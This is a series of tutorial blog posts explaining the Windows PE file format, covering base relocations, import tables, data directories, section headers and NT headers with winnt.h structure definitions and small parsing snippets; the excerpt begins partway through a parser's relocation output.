         Relocation Type: 0xA
         Offset: 0x1E0

       * Value: 0xA1E8
         Relocation Type: 0xA
         Offset: 0x1E8

       * Value: 0xA220
         Relocation Type: 0xA
         Offset: 0x220

       * Value: 0xA228
         Relocation Type: 0xA
         Offset: 0x228

       * Value: 0xA318
         Relocation Type: 0xA
         Offset: 0x318

       * Value: 0xA330
         Relocation Type: 0xA
         Offset: 0x330

       * Value: 0xA338
         Relocation Type: 0xA
         Offset: 0x338

       * Value: 0xA3D8
         Relocation Type: 0xA
         Offset: 0x3D8

       * Value: 0xA3E0
         Relocation Type: 0xA
         Offset: 0x3E0

       * Value: 0xA3E8
         Relocation Type: 0xA
         Offset: 0x3E8

   ----------------------


 ----------------------------------

I hope that seeing actual code has given you a better understanding of what we’ve discussed throughout the previous posts.
I believe there are better ways to implement this than the ones I have presented; I’m in no way a C++ programmer and I know there’s always room for improvement, so feel free to reach out to me. Any feedback would be much appreciated.

Thanks for reading.

A dive into the PE file format - PE file structure - Part 6: PE Base Relocations

By: 0xRick
28 October 2021 at 15:00


Introduction

In this post we’re going to talk about PE base relocations. We’re going to discuss what relocations are, then we’ll take a look at the relocation table.


Relocations

When a program is compiled, the compiler assumes that the executable is going to be loaded at a certain base address; that address is saved in IMAGE_OPTIONAL_HEADER.ImageBase, and some addresses get calculated and then hardcoded within the executable based on it.
However, for a variety of reasons it’s not very likely that the executable will actually get its desired base address; it will get loaded at another base address, and that will make all of the hardcoded addresses invalid.
A list of all hardcoded values that need fixing if the image is loaded at a different base address is saved in a special table called the Relocation Table (a Data Directory within the .reloc section). The process of relocating (done by the loader) is what fixes these values.

Let’s take an example, the following code defines an int variable and a pointer to that variable:

int test = 2;
int* testPtr = &test;

At compile time, the compiler assumes a base address, let’s say 0x1000. It decides that test will be located at an offset of 0x100, and based on that it gives testPtr a value of 0x1100.
Later on, a user runs the program and the image gets loaded into memory.
It gets a base address of 0x2000, which means the hardcoded value of testPtr is now invalid. The loader fixes that value by adding the difference between the assumed base address and the actual base address, in this case 0x1000 (0x2000 - 0x1000), so the new value of testPtr becomes 0x2100 (0x1100 + 0x1000), which is the correct new address of test.
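
To make that arithmetic concrete, here’s a minimal standalone sketch (not actual loader code; the variable names are made up for illustration) that applies the same fix-up:

#include <cstdint>
#include <cstdio>

int main() {
    uint64_t preferredBase = 0x1000;   // base address assumed at compile time
    uint64_t actualBase    = 0x2000;   // base address the image actually got
    uint64_t hardcodedPtr  = 0x1100;   // value of testPtr as written on disk

    // The loader adds the difference between the actual and the preferred base.
    uint64_t delta    = actualBase - preferredBase;   // 0x1000
    uint64_t fixedPtr = hardcodedPtr + delta;         // 0x2100

    printf("delta: 0x%llX, fixed pointer: 0x%llX\n",
           (unsigned long long)delta, (unsigned long long)fixedPtr);
    return 0;
}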


Relocation Table

As described by Microsoft documentation, the base relocation table contains entries for all base relocations in the image.

It’s a Data Directory located within the .reloc section, it’s divided into blocks, each block represents the base relocations for a 4K page and each block must start on a 32-bit boundary.

Each block starts with an IMAGE_BASE_RELOCATION structure followed by any number of offset field entries.

The IMAGE_BASE_RELOCATION structure specifies the page RVA, and the size of the relocation block.

typedef struct _IMAGE_BASE_RELOCATION {
    DWORD   VirtualAddress;
    DWORD   SizeOfBlock;
} IMAGE_BASE_RELOCATION;
typedef IMAGE_BASE_RELOCATION UNALIGNED * PIMAGE_BASE_RELOCATION;

Each offset field entry is a WORD. The high 4 bits define the relocation type (check the Microsoft documentation for a list of relocation types), and the low 12 bits store an offset from the RVA specified in the IMAGE_BASE_RELOCATION structure at the start of the relocation block.

Each relocation entry gets processed by adding the page RVA to the image base address; then, by adding the offset specified in the relocation entry, the absolute address of the location that needs fixing can be obtained.
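
As a rough sketch of that processing (standalone code using fixed-width types, with made-up names, not an actual loader implementation), extracting the type and offset from one entry and computing the address to patch could look like this:

#include <cstdint>

// One offset field entry: high 4 bits = relocation type, low 12 bits = offset.
struct DecodedReloc {
    uint16_t type;
    uint16_t offset;
};

DecodedReloc DecodeEntry(uint16_t entry) {
    DecodedReloc d;
    d.type   = entry >> 12;      // high 4 bits
    d.offset = entry & 0x0FFF;   // low 12 bits
    return d;
}

// Absolute address of the location that needs fixing.
uint64_t TargetAddress(uint64_t imageBase, uint32_t pageRVA, uint16_t entry) {
    return imageBase + pageRVA + DecodeEntry(entry).offset;
}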

The PE file I’m looking at contains only one relocation block, its size is 0x28 bytes:

We know that each block starts with an 8-byte-long structure, meaning that the entries take up 0x20 bytes (32 bytes); each entry is 2 bytes, so the total number of entries should be 16.


Conclusion

That’s all.
Thanks for reading.

A dive into the PE file format - PE file structure - Part 5: PE Imports (Import Directory Table, ILT, IAT)

By: 0xRick
28 October 2021 at 01:00


Introduction

In this post we’re going to talk about a very important aspect of PE files, the PE imports. To understand how PE files handle their imports, we’ll go over some of the Data Directories present in the Import Data section (.idata), the Import Directory Table, the Import Lookup Table (ILT) or also referred to as the Import Name Table (INT) and the Import Address Table (IAT).


Import Directory Table

The Import Directory Table is a Data Directory located at the beginning of the .idata section.

It consists of an array of IMAGE_IMPORT_DESCRIPTOR structures, each one of them is for a DLL.
It doesn’t have a fixed size, so the last IMAGE_IMPORT_DESCRIPTOR of the array is zeroed-out (NULL-Padded) to indicate the end of the Import Directory Table.

IMAGE_IMPORT_DESCRIPTOR is defined as follows:

typedef struct _IMAGE_IMPORT_DESCRIPTOR {
    union {
        DWORD   Characteristics;
        DWORD   OriginalFirstThunk;
    } DUMMYUNIONNAME;
    DWORD   TimeDateStamp;
    DWORD   ForwarderChain;
    DWORD   Name;
    DWORD   FirstThunk;
} IMAGE_IMPORT_DESCRIPTOR;
typedef IMAGE_IMPORT_DESCRIPTOR UNALIGNED *PIMAGE_IMPORT_DESCRIPTOR;
  • OriginalFirstThunk: RVA of the ILT.
  • TimeDateStamp: A time date stamp, that’s initially set to 0 if not bound and set to -1 if bound.
    In case of an unbound import the time date stamp gets updated to the time date stamp of the DLL after the image is bound.
    In case of a bound import it stays set to -1 and the real time date stamp of the DLL can be found in the Bound Import Directory Table in the corresponding IMAGE_BOUND_IMPORT_DESCRIPTOR .
    We’ll discuss bound imports in the next section.
  • ForwarderChain: The index of the first forwarder chain reference.
    This is something responsible for DLL forwarding. (DLL forwarding is when a DLL forwards some of its exported functions to another DLL.)
  • Name: An RVA of an ASCII string that contains the name of the imported DLL.
  • FirstThunk: RVA of the IAT.
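
Just to make this concrete, here’s a minimal sketch (separate from the parser in the other posts; the function name and parameters are made up) of walking this array in an image that’s already mapped into memory, where an RVA can simply be added to the image base:

#include <windows.h>
#include <cstdio>

// Prints the imported DLLs of a mapped image, given its base address and a
// pointer to the first IMAGE_IMPORT_DESCRIPTOR of the Import Directory Table.
void WalkImportDescriptors(BYTE* imageBase, IMAGE_IMPORT_DESCRIPTOR* pImportDir) {
    for (IMAGE_IMPORT_DESCRIPTOR* desc = pImportDir;
         desc->Name != 0 || desc->FirstThunk != 0;   // zeroed-out descriptor ends the table
         desc++) {
        // Name is an RVA to an ASCII string holding the DLL name.
        const char* dllName = (const char*)(imageBase + desc->Name);
        printf("%s (ILT RVA: 0x%X, IAT RVA: 0x%X)\n",
               dllName, desc->OriginalFirstThunk, desc->FirstThunk);
    }
}

For a file on disk, the RVAs would first have to be translated to file offsets, as done in the parser posts.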

Bound Imports

A bound import essentially means that the import table contains fixed addresses for the imported functions.
These addresses are calculated and written during compile time by the linker.

Using bound imports is a speed optimization, it reduces the time needed by the loader to resolve function addresses and fill the IAT, however if at run-time the bound addresses do not match the real ones then the loader will have to resolve these addresses again and fix the IAT.

When discussing IMAGE_IMPORT_DESCRIPTOR.TimeDateStamp, I mentioned that in case of a bound import, the time date stamp is set to -1 and the real time date stamp of the DLL can be found in the corresponding IMAGE_BOUND_IMPORT_DESCRIPTOR in the Bound Import Data Directory.

Bound Import Data Directory

The Bound Import Data Directory is similar to the Import Directory Table, however as the name suggests, it holds information about the bound imports.

It consists of an array of IMAGE_BOUND_IMPORT_DESCRIPTOR structures, and ends with a zeroed-out IMAGE_BOUND_IMPORT_DESCRIPTOR.

IMAGE_BOUND_IMPORT_DESCRIPTOR is defined as follows:

typedef struct _IMAGE_BOUND_IMPORT_DESCRIPTOR {
    DWORD   TimeDateStamp;
    WORD    OffsetModuleName;
    WORD    NumberOfModuleForwarderRefs;
// Array of zero or more IMAGE_BOUND_FORWARDER_REF follows
} IMAGE_BOUND_IMPORT_DESCRIPTOR,  *PIMAGE_BOUND_IMPORT_DESCRIPTOR;
  • TimeDateStamp: The time date stamp of the imported DLL.
  • OffsetModuleName: An offset to a string with the name of the imported DLL.
    It’s an offset from the first IMAGE_BOUND_IMPORT_DESCRIPTOR
  • NumberOfModuleForwarderRefs: The number of the IMAGE_BOUND_FORWARDER_REF structures that immediately follow this structure.
    IMAGE_BOUND_FORWARDER_REF is a structure that’s identical to IMAGE_BOUND_IMPORT_DESCRIPTOR, the only difference is that the last member is reserved.

That’s all we need to know about bound imports.


Import Lookup Table (ILT)

Sometimes people refer to it as the Import Name Table (INT).

Every imported DLL has an Import Lookup Table.
IMAGE_IMPORT_DESCRIPTOR.OriginalFirstThunk holds the RVA of the ILT of the corresponding DLL.

The ILT is essentially a table of names or references, it tells the loader which functions are needed from the imported DLL.

The ILT consists of an array of 32-bit numbers (for PE32) or 64-bit numbers (for PE32+); the last one is zeroed-out to indicate the end of the ILT.

Each of these entries encodes information as follows:

  • Bit 31/63 (most significant bit): This is called the Ordinal/Name flag; it specifies whether to import the function by name or by ordinal.
  • Bits 15-0: If the Ordinal/Name flag is set to 1, these bits hold the 16-bit ordinal number that will be used to import the function; bits 30-16/62-16 (for PE32/PE32+) must be set to 0.
  • Bits 30-0: If the Ordinal/Name flag is set to 0, these bits hold an RVA of a Hint/Name table entry.
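
As a small illustration (a standalone sketch with a made-up function name, not part of the code in this series), decoding a single 64-bit ILT entry along these lines could look like this:

#include <cstdint>

// Decodes one 64-bit ILT entry (PE32+). Returns true if the function is
// imported by ordinal (ordinal is filled in), false if imported by name
// (hintNameRVA is filled in with the RVA of the Hint/Name table entry).
bool DecodeILTEntry64(uint64_t entry, uint16_t& ordinal, uint32_t& hintNameRVA) {
    const uint64_t ordinalFlag = 1ULL << 63;        // Ordinal/Name flag (bit 63)
    if (entry & ordinalFlag) {
        ordinal = (uint16_t)(entry & 0xFFFF);       // bits 15-0: ordinal number
        return true;
    }
    hintNameRVA = (uint32_t)(entry & 0x7FFFFFFF);   // bits 30-0: Hint/Name RVA
    return false;
}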

Hint/Name Table

A Hint/Name table is a structure defined in winnt.h as IMAGE_IMPORT_BY_NAME:

typedef struct _IMAGE_IMPORT_BY_NAME {
    WORD    Hint;
    CHAR   Name[1];
} IMAGE_IMPORT_BY_NAME, *PIMAGE_IMPORT_BY_NAME;
  • Hint: A WORD that contains a number used to look up the function. That number is first used as an index into the export name pointer table; if that initial check fails, a binary search is performed on the DLL’s export name pointer table.
  • Name: A null-terminated string that contains the name of the function to import.

Import Address Table (IAT)

On disk, the IAT is identical to the ILT; however, when the binary is loaded into memory, the loader overwrites the IAT entries with the actual addresses of the imported functions.


Summary

So to summarize what we discussed in this post, for every DLL the executable is loading functions from, there will be an IMAGE_IMPORT_DESCRIPTOR within the Import Directory Table.
The IMAGE_IMPORT_DESCRIPTOR will contain the name of the DLL, and two fields holding RVAs of the ILT and the IAT.
The ILT will contain references for all the functions that are being imported from the DLL.
The IAT will be identical to the ILT until the executable is loaded in memory, then the loader will fill the IAT with the actual addresses of the imported functions.
If the DLL import is a bound import, then the import information will be contained in IMAGE_BOUND_IMPORT_DESCRIPTOR structures in a separate Data Directory called the Bound Import Data Directory.

Let’s take a quick look at the import information inside of an actual PE file.

Here’s the Import Directory Table of the executable:

All of these entries are IMAGE_IMPORT_DESCRIPTORs.

As you can see, the TimeDateStamp of all the imports is set to 0, meaning that none of these imports are bound, this is also confirmed in the Bound? column added by PE-bear.

For example, if we take USER32.dll and follow the RVA of its ILT (referenced by OriginalFirstThunk), we’ll find only 1 entry (because only one function is imported), and that entry looks like this:

This is a 64-bit executable, so the entry is 64 bits long.
As you can see, the last byte is set to 0, indicating that a Hint/Name table entry should be used to look up the function.
We know that the RVA of this Hint/Name table entry is referenced by the first 2 bytes, so we should follow RVA 0x29F8:

Now we’re looking at an IMAGE_IMPORT_BY_NAME structure, first two bytes hold the hint, which in this case is 0x283, the rest of the structure holds the full name of the function which is MessageBoxA.
We can verify that our interpretation of the data is correct by looking at how PE-bear parsed it, and we’ll see the same results:


Conclusion

That’s all I have to say about PE imports, in the next post I’ll discuss PE base relocations.
Thanks for reading.

A dive into the PE file format - PE file structure - Part 4: Data Directories, Section Headers and Sections

By: 0xRick
27 October 2021 at 01:00


Introduction

In the last post we talked about the NT Headers and we skipped the last part of the Optional Header which was the data directories.

In this post we’re going to talk about what data directories are and where they are located.
We’re also going to cover section headers and sections in this post.


Data Directories

The last member of the IMAGE_OPTIONAL_HEADER structure was an array of IMAGE_DATA_DIRECTORY structures defined as follows:

IMAGE_DATA_DIRECTORY DataDirectory[IMAGE_NUMBEROF_DIRECTORY_ENTRIES];

IMAGE_NUMBEROF_DIRECTORY_ENTRIES is a constant defined with the value 16, meaning that this array can have up to 16 IMAGE_DATA_DIRECTORY entries:

#define IMAGE_NUMBEROF_DIRECTORY_ENTRIES    16

An IMAGE_DATA_DIRECTORY structure is defined as follows:

typedef struct _IMAGE_DATA_DIRECTORY {
    DWORD   VirtualAddress;
    DWORD   Size;
} IMAGE_DATA_DIRECTORY, *PIMAGE_DATA_DIRECTORY;

It’s a very simple structure with only two members, the first being an RVA pointing to the start of the Data Directory and the second being the size of the Data Directory.

So what is a Data Directory? Basically a Data Directory is a piece of data located within one of the sections of the PE file.
Data Directories contain useful information needed by the loader. An example of a very important directory is the Import Directory, which contains a list of external functions imported from other libraries; we’ll discuss it in more detail when we go over PE imports.

Please note that not all Data Directories have the same structure; IMAGE_DATA_DIRECTORY.VirtualAddress points to the Data Directory, but the type of that directory is what determines how that chunk of data is going to be parsed.

Here’s a list of Data Directories defined in winnt.h. (Each one of these values represents an index in the DataDirectory array):

// Directory Entries

#define IMAGE_DIRECTORY_ENTRY_EXPORT          0   // Export Directory
#define IMAGE_DIRECTORY_ENTRY_IMPORT          1   // Import Directory
#define IMAGE_DIRECTORY_ENTRY_RESOURCE        2   // Resource Directory
#define IMAGE_DIRECTORY_ENTRY_EXCEPTION       3   // Exception Directory
#define IMAGE_DIRECTORY_ENTRY_SECURITY        4   // Security Directory
#define IMAGE_DIRECTORY_ENTRY_BASERELOC       5   // Base Relocation Table
#define IMAGE_DIRECTORY_ENTRY_DEBUG           6   // Debug Directory
//      IMAGE_DIRECTORY_ENTRY_COPYRIGHT       7   // (X86 usage)
#define IMAGE_DIRECTORY_ENTRY_ARCHITECTURE    7   // Architecture Specific Data
#define IMAGE_DIRECTORY_ENTRY_GLOBALPTR       8   // RVA of GP
#define IMAGE_DIRECTORY_ENTRY_TLS             9   // TLS Directory
#define IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG    10   // Load Configuration Directory
#define IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT   11   // Bound Import Directory in headers
#define IMAGE_DIRECTORY_ENTRY_IAT            12   // Import Address Table
#define IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT   13   // Delay Load Import Descriptors
#define IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR 14   // COM Runtime descriptor
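
As a quick usage sketch (standalone and hypothetical, assuming we already have a pointer to the NT Headers of a 64-bit image obtained elsewhere), one of these constants can be used to index the DataDirectory array like this:

#include <windows.h>
#include <cstdio>

// Prints the RVA and size of the Import Directory of a 64-bit image,
// using the index constant from winnt.h.
void PrintImportDirectory(IMAGE_NT_HEADERS64* ntHeaders) {
    IMAGE_DATA_DIRECTORY importDir =
        ntHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT];

    if (importDir.VirtualAddress == 0 && importDir.Size == 0) {
        printf("No Import Directory in this image.\n");
        return;
    }
    printf("Import Directory RVA: 0x%X, Size: 0x%X\n",
           importDir.VirtualAddress, importDir.Size);
}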

If we take a look at the contents of IMAGE_OPTIONAL_HEADER.DataDirectory of an actual PE file, we might see entries where both fields are set to 0:

This means that this specific Data Directory is not used (doesn’t exist) in the executable file.


Sections and Section Headers

Sections

Sections are the containers of the actual data of the executable file; they occupy the rest of the PE file after the headers, precisely after the Section Headers.
Some sections have special names that indicate their purpose. We’ll go over some of them; a full list of these names can be found in the official Microsoft documentation under the “Special Sections” section.

  • .text: Contains the executable code of the program.
  • .data: Contains the initialized data.
  • .bss: Contains uninitialized data.
  • .rdata: Contains read-only initialized data.
  • .edata: Contains the export tables.
  • .idata: Contains the import tables.
  • .reloc: Contains image relocation information.
  • .rsrc: Contains resources used by the program, these include images, icons or even embedded binaries.
  • .tls: (Thread Local Storage), provides storage for every executing thread of the program.

Section Headers

After the Optional Header and before the sections comes the Section Headers. These headers contain information about the sections of the PE file.

A Section Header is a structure named IMAGE_SECTION_HEADER defined in winnt.h as follows:

typedef struct _IMAGE_SECTION_HEADER {
    BYTE    Name[IMAGE_SIZEOF_SHORT_NAME];
    union {
            DWORD   PhysicalAddress;
            DWORD   VirtualSize;
    } Misc;
    DWORD   VirtualAddress;
    DWORD   SizeOfRawData;
    DWORD   PointerToRawData;
    DWORD   PointerToRelocations;
    DWORD   PointerToLinenumbers;
    WORD    NumberOfRelocations;
    WORD    NumberOfLinenumbers;
    DWORD   Characteristics;
} IMAGE_SECTION_HEADER, *PIMAGE_SECTION_HEADER;
  • Name: First field of the Section Header, a byte array of the size IMAGE_SIZEOF_SHORT_NAME that holds the name of the section. IMAGE_SIZEOF_SHORT_NAME has the value of 8 meaning that a section name can’t be longer than 8 characters. For longer names the official documentation mentions a work-around by filling this field with an offset in the string table, however executable images do not use a string table so this limitation of 8 characters holds for executable images.
  • PhysicalAddress or VirtualSize: A union defines multiple names for the same thing, this field contains the total size of the section when it’s loaded in memory.
  • VirtualAddress: The documentation states that for executable images this field holds the address of the first byte of the section relative to the image base when loaded in memory, and for object files it holds the address of the first byte of the section before relocation is applied.
  • SizeOfRawData: This field contains the size of the section on disk, it must be a multiple of IMAGE_OPTIONAL_HEADER.FileAlignment.
    SizeOfRawData and VirtualSize can be different, we’ll discuss the reason for this later in the post.
  • PointerToRawData: A pointer to the first page of the section within the file, for executable images it must be a multiple of IMAGE_OPTIONAL_HEADER.FileAlignment.
  • PointerToRelocations: A file pointer to the beginning of relocation entries for the section. It’s set to 0 for executable files.
  • PointerToLineNumbers: A file pointer to the beginning of COFF line-number entries for the section. It’s set to 0 because COFF debugging information is deprecated.
  • NumberOfRelocations: The number of relocation entries for the section, it’s set to 0 for executable images.
  • NumberOfLinenumbers: The number of COFF line-number entries for the section, it’s set to 0 because COFF debugging information is deprecated.
  • Characteristics: Flags that describe the characteristics of the section.
    These characteristics are things like if the section contains executable code, contains initialized/uninitialized data, can be shared in memory.
    A complete list of section characteristics flags can be found on the official Microsoft documentation.
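
As a small illustration of the Characteristics field described in the last item, here’s a minimal standalone sketch (the function name is made up) that tests a few of the common flags defined in winnt.h:

#include <windows.h>
#include <cstdio>

// Prints a few common characteristics of a section, using flag constants
// from winnt.h.
void PrintSectionCharacteristics(const IMAGE_SECTION_HEADER* section) {
    DWORD flags = section->Characteristics;

    printf("%.8s: %s%s%s%s\n",
           (const char*)section->Name,
           (flags & IMAGE_SCN_CNT_CODE)    ? "code "       : "",
           (flags & IMAGE_SCN_MEM_READ)    ? "readable "   : "",
           (flags & IMAGE_SCN_MEM_WRITE)   ? "writable "   : "",
           (flags & IMAGE_SCN_MEM_EXECUTE) ? "executable " : "");
}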

SizeOfRawData and VirtualSize can be different, and this can happen for multiple reasons.

SizeOfRawData must be a multiple of IMAGE_OPTIONAL_HEADER.FileAlignment, so if the section size is less than that value the rest gets padded and SizeOfRawData gets rounded to the nearest multiple of IMAGE_OPTIONAL_HEADER.FileAlignment.
However when the section is loaded into memory it doesn’t follow that alignment and only the actual size of the section is occupied.
In this case SizeOfRawData will be greater than VirtualSize

The opposite can happen as well.
If the section contains uninitialized data, these data won’t be accounted for on disk, but when the section gets mapped into memory, the section will expand to reserve memory space for when the uninitialized data gets later initialized and used.
This means that the section on disk will occupy less than it will do in memory, in this case VirtualSize will be greater than SizeOfRawData.
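
To see this difference in an actual file, you can dump both values for every section programmatically. Here’s a minimal sketch using the third-party pefile module (the module and the file path are my own choices for illustration, not something used elsewhere in this series):

import pefile   # pip install pefile

pe = pefile.PE("test.exe")   # example path

for section in pe.sections:
    name = section.Name.rstrip(b"\x00").decode()
    print(f"{name:8} VirtualSize=0x{section.Misc_VirtualSize:X} "
          f"SizeOfRawData=0x{section.SizeOfRawData:X}")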

Here’s the view of Section Headers in PE-bear:

We can see Raw Addr. and Virtual Addr. fields which correspond to IMAGE_SECTION_HEADER.PointerToRawData and IMAGE_SECTION_HEADER.VirtualAddress.

Raw Size and Virtual Size correspond to IMAGE_SECTION_HEADER.SizeOfRawData and IMAGE_SECTION_HEADER.VirtualSize.
We can see how these two fields are used to calculate where the section ends, both on disk and in memory.
For example, the .text section has a raw address of 0x400 and a raw size of 0xE00; if we add them together we get 0x1200, which is displayed as the section’s end on disk.
Similarly for the virtual address and size: the virtual address is 0x1000 and the virtual size is 0xD2C, and adding them together gives 0x1D2C.

The Characteristics field marks some sections as read-only, some other sections as read-write and some sections as readable and executable.

PointerToRelocations, NumberOfRelocations and NumberOfLinenumbers are set to 0 as expected.


Conclusion

That’s it for this post, we’ve discussed what Data Directories are and we talked about sections.
The next post will be about PE imports.
Thanks for reading.

A dive into the PE file format - PE file structure - Part 3: NT Headers

By: 0xRick
24 October 2021 at 01:00

A dive into the PE file format - PE file structure - Part 3: NT Headers

Introduction

In the previous post we looked at the structure of the DOS header and we reversed the DOS stub.

In this post we’re going to talk about the NT Headers part of the PE file structure.

Before we get into the post, we need to talk about an important concept that we’re going to see a lot, and that is the concept of a Relative Virtual Address or an RVA. An RVA is just an offset from where the image was loaded in memory (the Image Base). So to translate an RVA into an absolute virtual address you need to add the value of the RVA to the value of the Image Base. PE files rely heavily on the use of RVAs as we’ll see later.
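
For example, if an image happens to be loaded at a base address of 0x400000 and a header field holds the RVA 0x1000, the data it refers to lives at the absolute virtual address 0x400000 + 0x1000 = 0x401000. A tiny sketch of the translation (the numbers are made up purely for illustration):

image_base = 0x400000   # example base address the image was loaded at
rva        = 0x1000     # example RVA taken from a header field

virtual_address = image_base + rva
print(hex(virtual_address))   # 0x401000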


NT Headers (IMAGE_NT_HEADERS)

NT Headers is a structure defined in winnt.h as IMAGE_NT_HEADERS; by looking at its definition we can see that it has three members: a DWORD Signature, an IMAGE_FILE_HEADER structure called FileHeader and an IMAGE_OPTIONAL_HEADER structure called OptionalHeader.
It’s worth mentioning that this structure is defined in two different versions, one for 32-bit executables (Also named PE32 executables) named IMAGE_NT_HEADERS and one for 64-bit executables (Also named PE32+ executables) named IMAGE_NT_HEADERS64.
The main difference between the two versions is the used version of IMAGE_OPTIONAL_HEADER structure which has two versions, IMAGE_OPTIONAL_HEADER32 for 32-bit executables and IMAGE_OPTIONAL_HEADER64 for 64-bit executables.

typedef struct _IMAGE_NT_HEADERS64 {
    DWORD Signature;
    IMAGE_FILE_HEADER FileHeader;
    IMAGE_OPTIONAL_HEADER64 OptionalHeader;
} IMAGE_NT_HEADERS64, *PIMAGE_NT_HEADERS64;

typedef struct _IMAGE_NT_HEADERS {
    DWORD Signature;
    IMAGE_FILE_HEADER FileHeader;
    IMAGE_OPTIONAL_HEADER32 OptionalHeader;
} IMAGE_NT_HEADERS32, *PIMAGE_NT_HEADERS32;

Signature

The first member of the NT headers structure is the PE signature; it’s a DWORD, which means that it occupies 4 bytes.
It always has a fixed value: the bytes 0x50 0x45 0x00 0x00, which translate to PE\0\0 in ASCII (read as a little-endian DWORD the value is 0x00004550).

Here’s a screenshot from PE-bear showing the PE signature:

File Header (IMAGE_FILE_HEADER)

Also called “The COFF File Header”, the File Header is a structure that holds some information about the PE file.
It’s defined as IMAGE_FILE_HEADER in winnt.h, here’s the definition:

typedef struct _IMAGE_FILE_HEADER {
    WORD    Machine;
    WORD    NumberOfSections;
    DWORD   TimeDateStamp;
    DWORD   PointerToSymbolTable;
    DWORD   NumberOfSymbols;
    WORD    SizeOfOptionalHeader;
    WORD    Characteristics;
} IMAGE_FILE_HEADER, *PIMAGE_FILE_HEADER;

It’s a simple structure with 7 members:

  • Machine: This is a number that indicates the type of machine (CPU architecture) the executable is targeting. This field can have a lot of values, but we’re only interested in two of them: 0x8664 for AMD64 and 0x14C for i386. For a complete list of possible values you can check the official Microsoft documentation.
  • NumberOfSections: This field holds the number of sections (or the number of section headers aka. the size of the section table.).
  • TimeDateStamp: A unix timestamp that indicates when the file was created.
  • PointerToSymbolTable and NumberOfSymbols: These two fields hold the file offset to the COFF symbol table and the number of entries in that symbol table, however they get set to 0 which means that no COFF symbol table is present, this is done because the COFF debugging information is deprecated.
  • SizeOfOptionalHeader: The size of the Optional Header.
  • Characteristics: A flag that indicates the attributes of the file, these attributes can be things like the file being executable, the file being a system file and not a user program, and a lot of other things. A complete list of these flags can be found on the official Microsoft documentation.
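
To make the layout concrete, here’s a small sketch that reads these fields straight off the raw bytes with Python’s struct module (it assumes the file is a valid PE and does no error checking; the path is just an example):

import struct

with open("test.exe", "rb") as f:
    data = f.read()

e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]           # offset of the NT headers
machine, nsections, timestamp, ptr_sym, n_sym, opt_size, chars = \
    struct.unpack_from("<HHIIIHH", data, e_lfanew + 4)        # skip the 4-byte PE signature

print(hex(machine), nsections, hex(chars))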

Here’s the File Header contents of an actual PE file:

Optional Header (IMAGE_OPTIONAL_HEADER)

The Optional Header is the most important header of the NT headers, the PE loader looks for specific information provided by that header to be able to load and run the executable.
It’s called the optional header because some file types like object files don’t have it, however this header is essential for image files.
It doesn’t have a fixed size, that’s why the IMAGE_FILE_HEADER.SizeOfOptionalHeader member exists.

The first 8 members of the Optional Header structure are standard for every implementation of the COFF file format, the rest of the header is an extension to the standard COFF optional header defined by Microsoft, these additional members of the structure are needed by the Windows PE loader and linker.

As mentioned earlier, there are two versions of the Optional Header, one for 32-bit executables and one for 64-bit executables.
The two versions are different in two aspects:

  • The size of the structure itself (or the number of members defined within the structure): IMAGE_OPTIONAL_HEADER32 has 31 members while IMAGE_OPTIONAL_HEADER64 only has 30 members, that additional member in the 32-bit version is a DWORD named BaseOfData which holds an RVA of the beginning of the data section.
  • The data type of some of the members: The following 5 members of the Optional Header structure are defined as DWORD in the 32-bit version and as ULONGLONG in the 64-bit version:
    • ImageBase
    • SizeOfStackReserve
    • SizeOfStackCommit
    • SizeOfHeapReserve
    • SizeOfHeapCommit

Let’s take a look at the definition of both structures.

typedef struct _IMAGE_OPTIONAL_HEADER {
    //
    // Standard fields.
    //

    WORD    Magic;
    BYTE    MajorLinkerVersion;
    BYTE    MinorLinkerVersion;
    DWORD   SizeOfCode;
    DWORD   SizeOfInitializedData;
    DWORD   SizeOfUninitializedData;
    DWORD   AddressOfEntryPoint;
    DWORD   BaseOfCode;
    DWORD   BaseOfData;

    //
    // NT additional fields.
    //

    DWORD   ImageBase;
    DWORD   SectionAlignment;
    DWORD   FileAlignment;
    WORD    MajorOperatingSystemVersion;
    WORD    MinorOperatingSystemVersion;
    WORD    MajorImageVersion;
    WORD    MinorImageVersion;
    WORD    MajorSubsystemVersion;
    WORD    MinorSubsystemVersion;
    DWORD   Win32VersionValue;
    DWORD   SizeOfImage;
    DWORD   SizeOfHeaders;
    DWORD   CheckSum;
    WORD    Subsystem;
    WORD    DllCharacteristics;
    DWORD   SizeOfStackReserve;
    DWORD   SizeOfStackCommit;
    DWORD   SizeOfHeapReserve;
    DWORD   SizeOfHeapCommit;
    DWORD   LoaderFlags;
    DWORD   NumberOfRvaAndSizes;
    IMAGE_DATA_DIRECTORY DataDirectory[IMAGE_NUMBEROF_DIRECTORY_ENTRIES];
} IMAGE_OPTIONAL_HEADER32, *PIMAGE_OPTIONAL_HEADER32;
typedef struct _IMAGE_OPTIONAL_HEADER64 {
    WORD        Magic;
    BYTE        MajorLinkerVersion;
    BYTE        MinorLinkerVersion;
    DWORD       SizeOfCode;
    DWORD       SizeOfInitializedData;
    DWORD       SizeOfUninitializedData;
    DWORD       AddressOfEntryPoint;
    DWORD       BaseOfCode;
    ULONGLONG   ImageBase;
    DWORD       SectionAlignment;
    DWORD       FileAlignment;
    WORD        MajorOperatingSystemVersion;
    WORD        MinorOperatingSystemVersion;
    WORD        MajorImageVersion;
    WORD        MinorImageVersion;
    WORD        MajorSubsystemVersion;
    WORD        MinorSubsystemVersion;
    DWORD       Win32VersionValue;
    DWORD       SizeOfImage;
    DWORD       SizeOfHeaders;
    DWORD       CheckSum;
    WORD        Subsystem;
    WORD        DllCharacteristics;
    ULONGLONG   SizeOfStackReserve;
    ULONGLONG   SizeOfStackCommit;
    ULONGLONG   SizeOfHeapReserve;
    ULONGLONG   SizeOfHeapCommit;
    DWORD       LoaderFlags;
    DWORD       NumberOfRvaAndSizes;
    IMAGE_DATA_DIRECTORY DataDirectory[IMAGE_NUMBEROF_DIRECTORY_ENTRIES];
} IMAGE_OPTIONAL_HEADER64, *PIMAGE_OPTIONAL_HEADER64;
  • Magic: Microsoft documentation describes this field as an integer that identifies the state of the image, the documentation mentions three common values:

    • 0x10B: Identifies the image as a PE32 executable.
    • 0x20B: Identifies the image as a PE32+ executable.
    • 0x107: Identifies the image as a ROM image.

    The value of this field is what determines whether the executable is 32-bit or 64-bit; IMAGE_FILE_HEADER.Machine is ignored by the Windows PE loader.

  • MajorLinkerVersion and MinorLinkerVersion: The linker major and minor version numbers.

